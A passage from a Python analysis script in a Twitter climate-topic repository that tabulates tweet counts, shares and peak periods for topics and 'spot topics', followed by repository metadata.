f'{n_topic_tweets:,} ({n_topic_tweets / (distributions.sum() + EPS):.1%})',
f'{n_spot_tweets:,} ({n_spot_tweets / (distributions.T[spot_topics].sum() + EPS):.1%})',
f'{n_spot_tweets / n_topic_tweets:.1%}',
f'{mean_tweets_per_topic:.1f} ({std_tweets_per_topic:.1f})',
groups[distributions.T[annotations[:, st] > 0].sum(axis=0).argmax()]
])
tab.add_row(['TOTAL',
distributions.shape[1],
len(spot_topics),
'––',
f'{distributions.sum():,}',
f'{distributions.T[spot_topics].sum():,}',
f'{distributions.T[spot_topics].sum() / distributions.sum():.1%}',
f'{distributions.mean():.1f} ({distributions.std():.1f})',
groups[distributions.T.sum(axis=0).argmax()]
])
print(tab)
print('annotated topics:', sum(annotations.sum(axis=1) > 0))
print('num topics:', len(topics))
print('num spot topics:', len(spot_topics))
# when does each spot topic "peak"
r = []
for spt in spot_topics:
r.append((spt[0], groups[distributions.T[spt].argmax()]))
rs = sorted(r, key=lambda x: x[1])
print(rs)
|
TimRepke/twitter-climate
|
code/figures/supertopics/spot_topic_stats.py
|
spot_topic_stats.py
|
py
| 3,415 |
python
|
en
|
code
| 1 |
github-code
|
6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.